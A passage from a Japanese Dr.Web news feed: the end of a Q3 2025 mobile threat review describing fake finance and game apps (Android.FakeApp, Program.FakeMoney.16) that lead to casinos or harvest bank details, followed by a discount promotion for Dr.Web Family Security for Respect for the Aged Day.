    &lt;p&gt;詐欺スキームに用いられる &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; ファミリーに属する偽アプリも引き続き発見されています。これまで同様、その一部は参考書や教材、投資サービスにアクセスするためのソフトウェアなどといった金融関連アプリに偽装していました。また別の一部はゲームを装って拡散されています。このタイプの &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; は特定の条件下でゲームとして機能する代わりにオンラインカジノやブックメーカーのサイトを開く場合があります。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/06_Android.FakeApp.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;金融アプリを装った &lt;b&gt;Android.FakeApp&lt;/b&gt; トロイの木馬の例：金融リテラシーをテストするアプリに偽装した &lt;b&gt;Android.FakeApp.1889&lt;/b&gt; と、金融知識を向上させるアプリに偽装した &lt;b&gt;Android.FakeApp.1890&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;そのほか、望ましくないアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; も発見されました。&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt; は「Zeus Jackpot Mania」というアプリを装って拡散されており、このアプリでユーザーは仮想報酬を獲得し、現金化して引き出すことができるとうたっています。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/09_Program.FakeMoney.16_1_Zeus Jackpot Mania.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;Google Playで発見された &lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;現金を「引き出す」ためにユーザーはいくつか情報を提供するよう要求されます。最終的に被害者がお金を受け取ることはありません。&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.png" class="preview"&gt;
          &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/october/review_mobile_q3/10_Program.FakeMoney.16.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p style="text-align: center;"&gt;&lt;em&gt;ユーザーに氏名と銀行口座情報を提供するよう求める &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;お使いのAndroidデバイスをマルウェアや望ましくないプログラムから保護するために、Android向け Dr.Webアンチウイルス製品をインストールすることをお勧めします。&lt;/p&gt;

    &lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise(侵害の痕跡)※英語&lt;/a&gt;

&lt;/section&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15055&amp;lng=ja</guid><title>デジタル時代に感謝を伝えましょう ― 「敬老の日」を記念してDr.Web Family Securityを50%割引でご提供します</title><link>https://news.drweb.co.jp/show/?i=15055&amp;lng=ja&amp;c=5</link><pubDate>Mon, 15 Sep 2025 10:28:38 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年9月15日&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;日本の祝日「敬老の日」（Respect for the Aged Day）を記念して、ご高齢の方々へ感謝の気持ちをお伝えするため、特別キャンペーンを実施いたします。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;現代、お年寄りの方は、スマートフォン、パソコン、メッセンジャー経由でのコミュニケーションを活用しつつあります。しかし、インターネットを利用すると同時に、さまざまな脅威（詐欺サイトやフィッシングメールなど）に遭遇するリスクも発生します。こうしたリスクから大切な人を守ることが大切です。&lt;/p&gt;

&lt;p&gt;アプリケーションDr.Web Family Security 5+1を購入時に50%割引をご利用いただけます。本アプリケーションの活用により、ご家族の皆様のために安全なデジタル環境を実現できます。&lt;/p&gt;

&lt;p&gt;割引をご利用いただく方法&lt;/p&gt;

&lt;p&gt;&lt;a href="https://estore.drweb.co.jp/family_security/?lng=ja" traget="_blank"&gt;Doctor Webオンラインストアにお進みください。&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Dr.Web Family Security 5+1製品をショッピングカートに入れてください。&lt;/p&gt;

&lt;p&gt;プロモ用コード「Respect」 をフィールドに入力します。&lt;/p&gt;

&lt;p&gt;50%割引が自動的に適用されます。 &lt;/p&gt;

&lt;p&gt;本キャンペーン実施期間: 2025年9月15日 ～2025年9月21日&lt;/p&gt;

&lt;p&gt;デジタル体験がポジティブなものになるように、ご両親や祖父母に、気遣いだけでなく、安全なインターネットサーフィンの実現を是非ご検討ください。&lt;/p&gt;</description></item></channel></rss>
